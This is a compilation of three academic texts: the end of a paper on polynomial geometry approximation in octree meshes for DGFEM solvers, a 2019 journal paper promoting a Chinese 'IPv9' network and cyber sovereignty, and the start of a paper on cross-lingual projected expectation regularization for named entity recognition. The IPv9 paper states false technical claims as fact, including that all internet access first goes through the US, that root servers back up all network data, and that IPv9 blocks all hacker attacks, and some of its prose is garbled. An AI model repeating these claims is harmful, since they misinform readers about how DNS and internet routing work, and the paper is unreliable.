and the reference can be seen for a de-aliasing by 32 points. The color scale for the difference is chosen with a range of ±10% of the maximal amplitude in the reference. Table 2 L2 -error in the Mie scattering simulation after a simulation time of 0.42 for different geome- try approximations. Simulations were done with a spatial order of 16. The polynomial representation of the geometry uses a maximal polynomial degree of 31. For the time integration, a classical explicit fourth order Runge–Kutta scheme is used. ℓ aa = 1 aa = 2 aa = 4 5 3.452e–03 3.345e–03 2.973e–03 6 1.949e–03 2.066e–03 1.944e–03 8 1.491e–03 1.329e–03 1.318e–03 10 1.401e–03 1.235e–03 1.241e–03 ∞ 1.339e-03 approximated by polynomials with a maximal polynomial degree of 31 in each element. Similarly to Fig. 6, we can vary the number of integration points and the size of the smallest voxels in each element for the construction of these polynomials. To judge the quality of the thereby obtained cylinder approximations for the DGFEM scheme, we build the L2-error across the 8 × 8 elements enclosing the cylinder. For the comparison, we consider the instantaneous solution after simulating a time interval of 0.42 (the time it takes the impinging wave to move once by the diameter of the cylinder). The errors are measured in the Z component of the displacement field D and are shown in Table 2. We increase the voxel resolution (ℓ) from row to row in Table 2. In the columns we increase the anti-aliasing, that is the number of Chebyshev nodes to construct the polyno- mials of degree 31. The aa factor is to be understood as a multiplicator, such that with aa = 1 we use 32 points per direction to construct the polynomials and with aa = 4 we use 128. Klimach et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.35 16/19 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.35 As can be seen in Table 2, the error always improves with the voxel resolution ℓ. A higher anti-aliasing, however, does not always improve the solution quality. This behavior matches the observations in Fig. 6 and emphasizes the necessity for voxel resolutions that resolve the smallest distances between Chebyshev nodes. SUMMARY AND OUTLOOK Seeder is a mesh generating tool providing an Octree representation with cubical elements to a solver. We enhanced these cubical elements in this work by polynomial representations of material distributions within each element. To obtain these polynomials, we employ a first order voxelization utilizing the Octree refinement strategy with a colored flood filling to identify the material distribution. Numerical integration then transforms those detailed material distributions into multi-dimensional Legendre polynomials. This approach is highly robust and applicable to complex geometries. It does not impose strong requirements on the quality of the surface description. We have demonstrated that the proposed method indeed converges towards the optimal L2 projection of the nonsmooth target function onto the polynomial function space. The obtained geometry representation is suitable for high-order DGFEM solvers as we have shown in a small analysis for the scattering of a planar electromagnetic wave at a cylindrical obstacle. A possible improvement to the current staircase representation of the surface could be achieved by computing an approximate plane for the geometry within intersected voxels. While such a computation would introduce additional complexity and potentially expensive computations, it would reduce the number of voxels required to resolve the shortest distances between integration nodes. Nevertheless, the simple voxelization scheme currently deployed is already capable of discretizing large and complex settings and has been successfully used for highly detailed simulations. A general argument against high-order methods for scenarios with nonsmooth solutions is the bad convergence as given in Table 1. However, this can be overcome by an appropriate post-processing. In Zudrop & Hesthaven (2015) it is proven that high-order information can be recovered from solutions suffering from Gibbs oscillations. Such a post-processing step only needs to be applied to the final simulation result and has not been covered here. We believe the described geometry generation method enlarges the applicability of high-order methods to many settings with non-trivial geometries. ADDITIONAL INFORMATION AND DECLARATIONS Funding The authors received no funding for this work. Competing Interests The authors declare there are no competing interests. Klimach et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.35 17/19 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.35 Author Contributions • Harald G. Klimach wrote the paper, prepared figures and tables, performed the computation work, reviewed drafts of the paper. • Jens Zudrop performed the computation work, reviewed drafts of the paper. • Sabine P. Roller wrote the paper, reviewed drafts of the paper. Data Availability The following information was supplied regarding data availability: Bitbucket: https://bitbucket.org/apesteam/seeder. REFERENCES Alpert BK, Rokhlin V. 1991. A fast algorithm for the evaluation of legendre expansions. SIAM Journal on Scientific and Statistical Computing 12(1):158–179 DOI 10.1137/0912009. Bueno-Orovio A, Pérez-Garcı́a VM, Fenton FH. 2006. Spectral methods for partial differential equations in irregular domains: the spectral smoothed boundary method. SIAM Journal on Scientific Computing 28(3):886–900 DOI 10.1137/040607575. Gottlieb D, Hesthaven J. 2001. Spectral methods for hyperbolic problems. Numerical Analysis 2000. Vol. VII: Partial Differential Equations, Journal of Computational and Applied Mathematics 128(1–2):83–131. DOI 10.1016/S0377-0427(00)00510-0. Harlacher DF, Hasert M, Klimach H, Zimny S, Roller S. 2012. Tree based voxelization of STL data. In: Resch M, Wang X, Bez W, Focht E, Kobayashi H, Roller S, eds. High performance computing on vector systems 2011. Berlin Heidelberg: Springer, 81–92. Hesthaven JS, Warburton T. 2007. Nodal discontinuous Galerkin methods: algorithms, analysis, and applications. 1st edition. New York: Springer, DOI 10.1007/978-0-387-72067-8. Hindenlang F, Bolemann T, Munz C-D. 2015. Mesh curving techniques for high order discontinuous Galerkin simulations. In: Kroll N, Hirsch C, Bassi F, Johnston C, Hillewaert K, eds. IDIHOM: industrialization of high-order methods—a top-down approach: results of a collaborative research Project funded by the European Union, 2010–2014. Notes on numerical fluid mechanics and multidisciplinary design, volume 128. Cham: Springer International Publishing, 133–152 DOI 10.1007/978-3-319-12886-3. Ishida T, Takahashi S, Nakahashi K. 2008. Efficient and robust cartesian mesh generation for building-cube method. Journal of Computational Science and Technology 2(4):435–446 DOI 10.1299/jcst.2.435. Klimach H, Masilamani K, Harlacher D, Hasert M. 2015. Seeder. Available at https://bitbucket. org/apesteam/seeder (accessed 4 June 2015). Mie G. 1908. Beiträge zur optik trüber medien, speziell kolloidaler Metallösungen. Annalen der Physik 330(3):377–445 DOI 10.1002/andp.19083300302. Mittal R, Iaccarino G. 2005. Immersed boundary methods. Annual Review of Fluid Mechanics 37:239–261 DOI 10.1146/annurev.fluid.37.061903.175743. Peskin CS. 2002. The immersed boundary method. Acta Numerica 11:479–517 DOI 10.1017/S0962492902000077. Sabetghadam F, Sharafatmandjoor S, Norouzi F. 2009. Fourier spectral embedded boundary solution of the Poisson’s and laplace equations with dirichlet boundary conditions. Journal of Computational Physics 228(1):55–74 DOI 10.1016/j.jcp.2008.08.018. Klimach et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.35 18/19 https://peerj.com/computer-science/ https://bitbucket.org/apesteam/seeder https://bitbucket.org/apesteam/seeder https://bitbucket.org/apesteam/seeder https://bitbucket.org/apesteam/seeder https://bitbucket.org/apesteam/seeder http://dx.doi.org/10.1137/0912009 http://dx.doi.org/10.1137/040607575 http://dx.doi.org/10.1016/S0377-0427(00)00510-0 http://dx.doi.org/10.1007/978-0-387-72067-8 http://dx.doi.org/10.1007/978-3-319-12886-3 http://dx.doi.org/10.1299/jcst.2.435 https://bitbucket.org/apesteam/seeder https://bitbucket.org/apesteam/seeder https://bitbucket.org/apesteam/seeder https://bitbucket.org/apesteam/seeder https://bitbucket.org/apesteam/seeder https://bitbucket.org/apesteam/seeder https://bitbucket.org/apesteam/seeder https://bitbucket.org/apesteam/seeder https://bitbucket.org/apesteam/seeder https://bitbucket.org/apesteam/seeder https://bitbucket.org/apesteam/seeder https://bitbucket.org/apesteam/seeder https://bitbucket.org/apesteam/seeder https://bitbucket.org/apesteam/seeder https://bitbucket.org/apesteam/seeder https://bitbucket.org/apesteam/seeder https://bitbucket.org/apesteam/seeder https://bitbucket.org/apesteam/seeder https://bitbucket.org/apesteam/seeder https://bitbucket.org/apesteam/seeder https://bitbucket.org/apesteam/seeder https://bitbucket.org/apesteam/seeder https://bitbucket.org/apesteam/seeder https://bitbucket.org/apesteam/seeder https://bitbucket.org/apesteam/seeder https://bitbucket.org/apesteam/seeder https://bitbucket.org/apesteam/seeder https://bitbucket.org/apesteam/seeder https://bitbucket.org/apesteam/seeder https://bitbucket.org/apesteam/seeder https://bitbucket.org/apesteam/seeder https://bitbucket.org/apesteam/seeder https://bitbucket.org/apesteam/seeder https://bitbucket.org/apesteam/seeder https://bitbucket.org/apesteam/seeder https://bitbucket.org/apesteam/seeder https://bitbucket.org/apesteam/seeder http://dx.doi.org/10.1002/andp.19083300302 http://dx.doi.org/10.1146/annurev.fluid.37.061903.175743 http://dx.doi.org/10.1017/S0962492902000077 http://dx.doi.org/10.1016/j.jcp.2008.08.018 http://dx.doi.org/10.7717/peerj-cs.35 White E. 2013. What is an STL file? Available at http://www.3dsystems.com/quickparts/ learning-center/what-is-stl-file (accessed 4 June 2015). Wilbraham H. 1848. On a certain periodic function. The Cambridge and Dublin Mathematical Journal 3:198–201. Yerry MA, Shephard MS. 1984. Automatic three-dimensional mesh generation by the modified-octree technique. International Journal for Numerical Methods in Engineering 20(11):1965–1990 DOI 10.1002/nme.1620201103. Zudrop J, Hesthaven JS. 2015. Accuracy of high order and spectral methods for hyperbolic conservation laws with discontinuous solutions. SIAM Journal on Numerical Analysis 53(4):1857–1875 DOI 10.1137/140992758. Klimach et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.35 19/19 https://peerj.com/computer-science/ http://www.3dsystems.com/quickparts/learning-center/what-is-stl-file http://www.3dsystems.com/quickparts/learning-center/what-is-stl-file http://www.3dsystems.com/quickparts/learning-center/what-is-stl-file http://www.3dsystems.com/quickparts/learning-center/what-is-stl-file http://www.3dsystems.com/quickparts/learning-center/what-is-stl-file http://www.3dsystems.com/quickparts/learning-center/what-is-stl-file http://www.3dsystems.com/quickparts/learning-center/what-is-stl-file http://www.3dsystems.com/quickparts/learning-center/what-is-stl-file http://www.3dsystems.com/quickparts/learning-center/what-is-stl-file http://www.3dsystems.com/quickparts/learning-center/what-is-stl-file http://www.3dsystems.com/quickparts/learning-center/what-is-stl-file http://www.3dsystems.com/quickparts/learning-center/what-is-stl-file http://www.3dsystems.com/quickparts/learning-center/what-is-stl-file http://www.3dsystems.com/quickparts/learning-center/what-is-stl-file http://www.3dsystems.com/quickparts/learning-center/what-is-stl-file http://www.3dsystems.com/quickparts/learning-center/what-is-stl-file http://www.3dsystems.com/quickparts/learning-center/what-is-stl-file http://www.3dsystems.com/quickparts/learning-center/what-is-stl-file http://www.3dsystems.com/quickparts/learning-center/what-is-stl-file http://www.3dsystems.com/quickparts/learning-center/what-is-stl-file http://www.3dsystems.com/quickparts/learning-center/what-is-stl-file http://www.3dsystems.com/quickparts/learning-center/what-is-stl-file http://www.3dsystems.com/quickparts/learning-center/what-is-stl-file http://www.3dsystems.com/quickparts/learning-center/what-is-stl-file http://www.3dsystems.com/quickparts/learning-center/what-is-stl-file http://www.3dsystems.com/quickparts/learning-center/what-is-stl-file http://www.3dsystems.com/quickparts/learning-center/what-is-stl-file http://www.3dsystems.com/quickparts/learning-center/what-is-stl-file http://www.3dsystems.com/quickparts/learning-center/what-is-stl-file http://www.3dsystems.com/quickparts/learning-center/what-is-stl-file http://www.3dsystems.com/quickparts/learning-center/what-is-stl-file http://www.3dsystems.com/quickparts/learning-center/what-is-stl-file http://www.3dsystems.com/quickparts/learning-center/what-is-stl-file http://www.3dsystems.com/quickparts/learning-center/what-is-stl-file http://www.3dsystems.com/quickparts/learning-center/what-is-stl-file http://www.3dsystems.com/quickparts/learning-center/what-is-stl-file http://www.3dsystems.com/quickparts/learning-center/what-is-stl-file http://www.3dsystems.com/quickparts/learning-center/what-is-stl-file http://www.3dsystems.com/quickparts/learning-center/what-is-stl-file http://www.3dsystems.com/quickparts/learning-center/what-is-stl-file http://www.3dsystems.com/quickparts/learning-center/what-is-stl-file http://www.3dsystems.com/quickparts/learning-center/what-is-stl-file http://www.3dsystems.com/quickparts/learning-center/what-is-stl-file http://www.3dsystems.com/quickparts/learning-center/what-is-stl-file http://www.3dsystems.com/quickparts/learning-center/what-is-stl-file http://www.3dsystems.com/quickparts/learning-center/what-is-stl-file http://www.3dsystems.com/quickparts/learning-center/what-is-stl-file http://www.3dsystems.com/quickparts/learning-center/what-is-stl-file http://www.3dsystems.com/quickparts/learning-center/what-is-stl-file http://www.3dsystems.com/quickparts/learning-center/what-is-stl-file http://www.3dsystems.com/quickparts/learning-center/what-is-stl-file http://www.3dsystems.com/quickparts/learning-center/what-is-stl-file http://www.3dsystems.com/quickparts/learning-center/what-is-stl-file http://www.3dsystems.com/quickparts/learning-center/what-is-stl-file http://www.3dsystems.com/quickparts/learning-center/what-is-stl-file http://www.3dsystems.com/quickparts/learning-center/what-is-stl-file http://www.3dsystems.com/quickparts/learning-center/what-is-stl-file http://www.3dsystems.com/quickparts/learning-center/what-is-stl-file http://www.3dsystems.com/quickparts/learning-center/what-is-stl-file http://www.3dsystems.com/quickparts/learning-center/what-is-stl-file http://www.3dsystems.com/quickparts/learning-center/what-is-stl-file http://www.3dsystems.com/quickparts/learning-center/what-is-stl-file http://www.3dsystems.com/quickparts/learning-center/what-is-stl-file http://www.3dsystems.com/quickparts/learning-center/what-is-stl-file http://www.3dsystems.com/quickparts/learning-center/what-is-stl-file http://www.3dsystems.com/quickparts/learning-center/what-is-stl-file http://www.3dsystems.com/quickparts/learning-center/what-is-stl-file http://www.3dsystems.com/quickparts/learning-center/what-is-stl-file http://dx.doi.org/10.1002/nme.1620201103 http://dx.doi.org/10.1137/140992758 http://dx.doi.org/10.7717/peerj-cs.35 Generation of high order geometry representations in Octree meshes Introduction Related Work The Seeder Mesh Generator Basic mesh generation procedure Generation of the Polynomial Geometry Approximation Coloring Sub-resolution Numerical Properties Application in DGFEM for Electrodynamics Summary and Outlook References work_4w3odkddrjadtj7ujjam2avyky ---- International Journal of Advanced Network, Monitoring and Controls Volume 04, No.01, 2019 61 From Network Security to Network Autonomous Wang Yubian* Department of Railway Transportation Control Belarusian State University of Transport 34, Kirova street,Gomel,246653 Republic of Belarus *is the communication author. e-mail: alika_wang@mail.ru Yuri Shebzukhov Department of the International Relations Belarusian State University of Transport Republic of Belarus 34, Kirovastreet, Gomel, 246653 Republic of Belarus e-mail: oms@bsut.by Abstract—In the 20th century, the emergence of the Internet has completely changed the work and life of human beings around the world. Today, people are increasingly inseparable from network. The Internet has been integrated with the global industry, agriculture, education, science,technologyand national defense. The current Internet was originated in the United States. The Internet systems based on IPv4 and IPv6,they are controlled by the United States completely. Computers connected to the Internet are subject to data retention and backup in the United States. Data security is greatly threatened. In addition, due to limitations and loopholes in the design of the Internet, the Internet is subject to many different types of attacks. Internet research which based on security autonomy has received the attention of sovereign countries in the world. This paper mainly introduces the Future Internet system developed by Chinese researchers based on the current research on Internet servers,which is a new generation network system,the research and application of this system will have a profound impact on the world's Internet. Keywords-Network Security; Root Server; Network Autonomous; Future Internet People can’t live without the internet;internet has become a necessity in daily life.The share of the network economy has accounted for 22% of the global GDP. The importance of the network has become more and more prominent, so the basic work about the network is even more important. Now the Internet has two biggest problems. One is the cyber sovereignty, which is about the network’s belongs. It is obviously that the United Stateshold the internet. How to adhere to cyber sovereignty is still a challenge. Another problem is that many countries hope the operators will speed up and reduce the cost at the same time. It need the operators to reduce the bandwidth cost of access to the Internet by SMEs, and how to reduce the bandwidth fee for accessing the Internet is a problem. This two major problems are now more difficult to solve, and why? We need specific analysis of specific issues and tell everyone what solutions we have. I. CYBERSPACE First of all, there must be a definition of cyberspace. This is very important. How do we adhere to the sovereignty of cyberspace?Currently,there is noaccurate definition in the media, and we think it should be definedproperly. Cyberspace is a virtual space that contains three basic elements.In the space,virtual and real are contained, and dominated by virtual. In this virtual cyberspace, it is not these infrastructures that are in the most important leadership position, nor our application environment, but the full root system. This must be clear, if this is not clear, many explanations will go wrong. The core embodiment of cyberspace sovereignty is the standard protocol for data communication technology. At present, it includes the IPv4, IPv6 and future network/IPV9 network data communication standards and protocols of the existing equipment running in the world, and the formed network space address naming rights, distribution rights, resolution rights and route addressing operation management rights. The core resources of cyberspace include: the parent root server, the primary server, the 13 root name servers, the IP address of the address and domain name resolution system, asset equipment and operation management rights. Therefore, it can be said who owns the core assets of cyberspace, who masters the sovereignty of cyberspace. DOI: 10.21307/ijanmc-2019-035 International Journal of Advanced Network, Monitoring and Controls Volume 04, No.01, 2019 62 II. INTERNET SERVER The working principle of the current public network is not thoroughly understood. Actually, this is very important. This determines how to adhere the cyberspace sovereignty. This is determined the basic principles. Any time we access the network, including any computer on the Internet, phone Internet access and mobile Internet access. Firstly, we must access the root server. The root system consists of the parent root server and the primary root server (the publishing host). This hidden publishing host only 13 root domain name servers (13 root domain name servers are equal rights) that can be accessed to maintain this hidden publishing host. The 13 root domain name servers read the primary root server, then read the parent root server and obtain the data, then read by the mirror server, and spread to the entire network. The root server is mainly used to manage the home directory of the Internet. All parent, root, and sub- servers of IPv4 are managed by ICANN, an Internet domain name and number assignment authority authorized by the US government are responsible for the management of global Internet domain name root servers, domain name systems, and IP addresses. There are only 13 root name servers in the world. Ten of them are in the United States, two in Europe, in the United Kingdom and Sweden, and one in Asia in Japan. These 13 logical root servers direct web browsers such as Firefox or Internet Explorer and email programs to control Internet communications. Because the root server has more than 1000 Internet domain name suffixes (such as .edu, .com, etc.) approved by the US government and all national domain names (such as .us in the US, .cn in China, etc.). Since the establishment of the Internet, the world has become very dependent on the United States. The United States has controlled the entire Internet by controlling the root server, posing a potentially major threat to cybersecurity in other countries. The so- called dependence, embodied in the working mechanism of the Internet, lies in the problem of "root server". In theory, any form of standard domain name to be analyzed, in accordance with the technical process, must be completed through the work of the global "hierarchical" domain name resolution system. The first layer of the "hierarchical" domain name resolution system is the root server, which is responsible for managing domain name information of countries all over the world. Below the root server is a top-level domain name server, that is, a database of relevant national domain name management institutions, such as CNNIC in China, and then at the next level. The domain name database and the ISP's cache server. A domain name must first be parsed by the root database before it can be redirected to the top- level domain name server. III. INTERNET ACCESS AND SECURITY Any network access in the world should firstvisit the United States, and now some people say that many visits are not going abroad, and indeed some businesses do not feel abroad for the time being. In fact, the mirror root serversare working and cache serversare working. The Internet set up mirror servers in some countries without root servers, but these servers are completely controlled by the United States. Commonly used URLs can be parsed locally, and data can cache locally to prevent network congestion. However, the root of the Internet can back up the entire network. Traffic can still go out, although most of the data traffic business is domestic. This is why the United States monitors the world through the Internet, and because of economic reasons, the data traffic to the root system is two-way billing. Since the widespread use of the Internet, the Internet has been constantly challenged, and various types of attacks from all over the world have continued. Typical server failures are as follows. A. Failure in 1997 In July 1997, a new general list of Internet address assignments was automatically passed between these domain name servers, but this list is actually blank. This human error led to the most severe local service disruption on the Internet, resulting in inaccessible web pages within a few days and the inability to send emails. B. Attack in 2002 On October 21, 2002, at 4:45 pm ET, the 13 servers were hit by the most serious and largest cyber-attack in history. The attack was a DDoS attack (Distributed Denial of Service). With the help of client/server technology, this attack combines multiple computers as attack platforms and launches attacks on one or more targets, thus doubling the power of denial of service attacks. Data that is 30 to 40 times more than the conventional number rushed to these servers and caused 9 of them to not function properly. Seven units lost their ability to handle network communications, and the other two were immediately behind. This attack may not be affected by the average user. If you only analyze from the "consequences" of this incident, some people may think that "not all root name servers will be attacked, so you can rest assured", or International Journal of Advanced Network, Monitoring and Controls Volume 04, No.01, 2019 63 "the root name server has no problem with the root name server", it is still too early. But they are not clear about the root cause. Not all root name servers are affected; the attack ends in a short period of time; the attack is relatively simple, so it is easy to take appropriate measures. Since there is no particularly effective solution for DDoS attacks, imagine that if the attack time is extended, the attack is a bit more complicated, or there is one more server, the global Internet will have quite a few web browsing and e-mail services. This will be completely interrupted. C. DNS failure at the beginning of 2014 Beginning around 15:00 on January 21, 2014, there was a problem with DNS resolution of a large number of Internet domain names around the world. Some well-known websites and all non-existent domain names were incorrectly pointed to 65.49.2.178 (Fremont, California, United States, Hurricane Electric). China's DNS domain name resolution system has experienced a wide range of access failures, which have been confirmed by several DNS domain name resolution service providers, including DNSPod. The accident affected the whole country. Nearly two-thirds of the websites had access faults in different areas and network environments to varying degrees. The framework of the entire network information security can be divided into three levels.  Information security of various services at the network application layer, killing viruses, anti- Trojans, hardening firewalls and proactively defending against network attacks are the main tasks of network security departments in different countries. Andmany information security is mainly supported by encryption technology. As long as they are targeted by capable hackers, it is only a matter of time before information encryption and decryption are made.  The network core equipment and terminal equipment, including the CPU core chip and the OS operating system/database are all from the United States. The information of this equipment is transparent to the United States and the NSA, and there is no security possibility.  The problem of network information security caused by the lack of network sovereignty is a more global problem. Each bit under each communication IP address is monitored by the US Internet root system. All data is analyzed by the US National Security Bureau for big data analysis, and then stored and archived. The encrypted information is decrypted according to the specific situation! In order to change the situation, China’s cyberspace is in a serious strategic passive situation, in order to defend the network sovereignty and build a new generation of sovereign networks with domestically controllable security, some countries have carried out research and development of some network system structures. IV. THE NEW GENERATION OF THE INTERNET In 2001, Ministry of Information Industry of China established the “Decimal Network Standard Working Group”. In 2007, Ministry of Information Industry of Chinadefined IPV9 as a new generation Internet to distinguish IPv6 officially. In order to break through the future network basic theory and support the next generation Internet experiment and build the future network test facilities, including: original network equipment system, resource monitoring management system, covering cloud computing services, Internet of things applications, spatial information network simulation, network information security open network test systems such as high-performance integrated circuit verification and quantum communication networks. In December 2014, the core parts of the future international standards published by ISO/IEC, such as "Name and Addressing" and "Safety", are dominated by Chinese experts and have core intellectual property rights. The future network has clear and unique definitions. Major countries such as the United States, Russia, Canada, and South Korea have voted in favor. On June 1,2016, Ministry of information Industry of China published the relevant industry standards for IPV9 implementation in the country: SJ/T11605, SJ/T11604, SJ/T11603, SJ/T11606. This marks the 20-years hard workingreceive rewards. The Chinese government has adopted the mature IPV9 main root/mother root/13 root name server system named from NZ. The core backbone router and user router product series have begun to build autonomous, intellectual property rights, and computer communication networks that are independent of the US Internet but are Internet compatible. International Journal of Advanced Network, Monitoring and Controls Volume 04, No.01, 2019 64 The main features of the future network/IPV9 are as following. A. Increasing the geographical and national concepts get increase It is distributed and managed by countries, and it is close to the analysis, and the flow of information is reasonable. End-to-end communication can be realized according to requirements, and it is not necessary to be controlled by the United States like IPv4 and IPv6. It is low-cost, high-efficiency, and it saves network expenses andachieves environmental protection. B. Realizing the unification of electronic tag and barcodes The huge address capacity of IPv9 realizes the uniqueness of address allocation. The combination of IP address, digital domain name and electronic tag and bar code coding technology will extends the network to every corner of sensor technology. IPv9 enables bar codes to have the same Internet access function as electronic tags, and can track and control the circulation of goods and equipment from the production plant. The bar code can also be identified when the RFID electronic tag wireless channel is disturbed. China's unique barcode and RFID electronic label hybrid technology will greatly reduce the management costs of the global manufacturing and logistics industries. C. Realize multi-code integration IPv9 not only makes the domain name and IP address unified, but also can be combined with the global unique identifier of the person or thing, so that the phone number, mobile phone number, domain name and IP address can be combined into one number; The same code for electronic tags and barcodes is a solution and application platform for the future information society and the realization of “ubiquitous” networks. D. Real-name Internet access IPv9 network can realize real-name Internet access, and can also protect customers' privacy rights. It can open up a certain number of anonymous addresses for blog use, but it does not allow anonymous address users to enter banks, government, social welfare, commodity circulation, etc. E. IPv9 has address encryption Different from the current means of encrypting applications, IPv9 innovatively designed address encryption to extend security protection to the network layer, greatly improving the country's information security. Whether it is IPv4 currently in use or the next-generation Internet protocol IPv6 proposed by foreign countries is unmatched. The IPv9 communication protocol packet structure is designed reasonably, and the packet item function is clear. The IPv9 protocol is better than the IPv4 protocol in terms of address space, service quality, and security. When the application support and network device support are mature, the IPv9 protocol can replace the IPv4 protocol and become a communication protocol for network interconnection. The address representation of the data packets of the IPv9 protocol is different from that of the IPv4 or IPv6 protocol. Therefore, the data packet header of the IPv9 protocol will not be recognized by the IPv4 or IPv6 system and will not be directly transmitted in these systems. Therefore, using IPv9 protocol communication, its data messages will not be directly transmitted to other protocols' networks, thus controlling the data transmission range and improving the security of communication to a certain extent. F. Currently, all hacker attacks and all online eavesdropping software are developed based on IPv4 IPv6 routers and V9 NICs will not release these attack packets from hackers and hackers, and will build a Great Wall for hacking and online intelligence. V. SUMMARY The new generation Internet based on IPV9, the main root/mother root server system, the domain name resolution system, the backbone router/user router are all independently developed and produced by China, and are compatible with IPv4/IPv6. They support all existing applications of IPv4, and the underlying network itself adds IPv4/IPv6. There is no security mechanism, the address itself can be encrypted, and the communication can be verified first. At the same time, the new generation network address is extremely rich, and it also includes information such as geographic location/industry category. In the future, the network/IPV9 starts with the address 2^256 power, and the number of addresses for managing digital assets can reach 2^2048 power, future network. /IPV9 can not only meet the global 750-year communication address demand, but also an important tool for digital asset management. It is the core foundation for the future digital world/digital global and the future community of cyberspace destiny. International Journal of Advanced Network, Monitoring and Controls Volume 04, No.01, 2019 65 REFERENCES [1] Xie Jianping etc.Method of using whole digital code to assign address for computer [P]. US: 8082365, 2011.12. [2] S. Deering, R. Hinden, Network Working Group. Internet Protocol, Version 6 (IPv6)-Specification, RFC-1883, 1995.12. [3] M. Crawford. Network Working Group. Transmission of IPv6 Packets over Ethernet Networks.RFC-2464, 1998.12. [4] J. Onions, Network Working Group. A Historical Perspective on the usage of IP version 9. RFC1606. 1994.04. [5] V. Cerf, Network Working Group. A VIEW FROM THE 21ST CENTURY, RFC1607. 1994.04. [6] Information technology-Future Network- Problem statement and requirement-Part 2: Naming and addressing, ISO/IEC DTR 29181-2, 2014, 12. [7] Radio frequency identification tag information query service network architecture technical specification. SJ/T11606-2016, 2016. 06. work_4wuutuv2lfhhdgl2dgr6ruegii ---- Cross-lingual Projected Expectation Regularization for Weakly Supervised Learning Cross-lingual Projected Expectation Regularization for Weakly Supervised Learning Mengqiu Wang and Christopher D. Manning Computer Science Department Stanford University Stanford, CA 94305 USA {mengqiu,manning}@cs.stanford.edu Abstract We consider a multilingual weakly supervised learning scenario where knowledge from an- notated corpora in a resource-rich language is transferred via bitext to guide the learning in other languages. Past approaches project labels across bitext and use them as features or gold labels for training. We propose a new method that projects model expectations rather than labels, which facilities transfer of model uncertainty across language bound- aries. We encode expectations as constraints and train a discriminative CRF model using Generalized Expectation Criteria (Mann and McCallum, 2010). Evaluated on standard Chinese-English and German-English NER datasets, our method demonstrates F1 scores of 64% and 60% when no labeled data is used. Attaining the same accuracy with su- pervised CRFs requires 12k and 1.5k labeled sentences. Furthermore, when combined with labeled examples, our method yields signifi- cant improvements over state-of-the-art super- vised methods, achieving best reported num- bers to date on Chinese OntoNotes and Ger- man CoNLL-03 datasets. 1 Introduction Supervised statistical learning methods have en- joyed great popularity in Natural Language Process- ing (NLP) over the past decade. The success of su- pervised methods depends heavily upon the avail- ability of large amounts of annotated training data. Manual curation of annotated corpora is a costly and time consuming process. To date, most annotated re- sources resides within the English language, which hinders the adoption of supervised learning methods in many multilingual environments. To minimize the need for annotation, significant progress has been made in developing unsupervised and semi-supervised approaches to NLP (Collins and Singer 1999; Klein 2005; Liang 2005; Smith 2006; Goldberg 2010; inter alia) . More recent paradigms for semi-supervised learning allow mod- elers to directly encode knowledge about the task and the domain as constraints to guide learning (Chang et al., 2007; Mann and McCallum, 2010; Ganchev et al., 2010). However, in a multilingual setting, coming up with effective constraints require extensive knowledge of the foreign1 language. Bilingual parallel text (bitext) lends itself as a medium to transfer knowledge from a resource-rich language to a foreign languages. Yarowsky and Ngai (2001) project labels produced by an English tag- ger to the foreign side of bitext, then use the pro- jected labels to learn a HMM model. More recent work applied the projection-based approach to more language-pairs, and further improved performance through the use of type-level constraints from tag dictionary and feature-rich generative or discrimina- tive models (Das and Petrov, 2011; Täckström et al., 2013). In our work, we propose a new projection-based method that differs in two important ways. First, we never explicitly project the labels. Instead, we project expectations over the labels. This projection 1For experimental purposes, we designate English as the resource-rich language, and other languages of interest as “for- eign”. In our experiments, we simulate the resource-poor sce- nario using Chinese and German, even though in reality these two languages are quite rich in resources. 55 Transactions of the Association for Computational Linguistics, 2 (2014) 55–66. Action Editor: Lillian Lee. Submitted 9/2013; Revised 12/2013; Published 2/2014. c©2014 Association for Computational Linguistics. acts as a soft constraint over the labels, which al- lows us to transfer more information and uncertainty across language boundaries. Secondly, we encode the expectations as constraints and train a model by minimizing divergence between model expectations and projected expectations in a Generalized Expec- tation (GE) Criteria (Mann and McCallum, 2010) framework. We evaluate our approach on Named Entity Recognition (NER) tasks for English-Chinese and English-German language pairs on standard public datasets. We report results in two settings: a weakly supervised setting where no labeled data or a small amount of labeled data is available, and a semi- supervised settings where labeled data is available, but we can gain predictive power by learning from unlabeled bitext. 2 Related Work Most semi-supervised learning approaches embody the principle of learning from constraints. There are two broad categories of constraints: multi-view con- straints, and external knowledge constraints. Examples of methods that explore multi-view constraints include self-training (Yarowsky, 1995; McClosky et al., 2006),2 co-training (Blum and Mitchell, 1998; Sindhwani et al., 2005), multi- view learning (Ando and Zhang, 2005; Carlson et al., 2010), and discriminative and generative model combination (Suzuki and Isozaki, 2008; Druck and McCallum, 2010). An early example of using knowledge as con- straints in weakly-supervised learning is the work by Collins and Singer (1999). They showed that the addition of a small set of “seed” rules greatly im- prove a co-training style unsupervised tagger. Chang et al. (2007) proposed a constraint-driven learning (CODL) framework where constraints are used to guide the selection of best self-labeled examples to be included as additional training data in an iterative EM-style procedure. The kind of constraints used in applications such as NER are the ones like “the words CA, Australia, NY are LOCATION” (Chang et al., 2007). Notice the similarity of this partic- 2A multi-view interpretation of self-training is that the self- tagged additional data offers new views to learners trained on existing labeled data. ular constraint to the kinds of features one would expect to see in a discriminative MaxEnt model. The difference is that instead of learning the valid- ity (or weight) of this feature from labeled exam- ples — since we do not have them — we can con- strain the model using our knowledge of the domain. Druck et al. (2009) also demonstrated that in an ac- tive learning setting where annotation budget is lim- ited, it is more efficient to label features than ex- amples. Other sources of knowledge include lexi- cons and gazetteers (Druck et al., 2007; Chang et al., 2007). While it is straight-forward to see how resources such as a list of city names can give a lot of mileage in recognizing locations, we are also exposed to the danger of over-committing to hard constraints. For example, it becomes problematic with city names that are ambiguous, such as Augusta, Georgia.3 To soften these constraints, Mann and McCallum (2010) proposed the Generalized Expectation (GE) Criteria framework, which encodes constraints as a regularization term over some score function that measures the divergence between the model’s ex- pectation and the target expectation. The connection between GE and CODL is analogous to the relation- ship between hard (Viterbi) EM and soft EM, as il- lustrated by Samdani et al. (2012). Another closely related work is the Posterior Regularization (PR) framework by Ganchev et al. (2010). In fact, as Bellare et al. (2009) have shown, in a discriminative model these two methods opti- mize exactly the same objective.4 The two differ in optimization details: PR uses a EM algorithm to approximate the gradients which 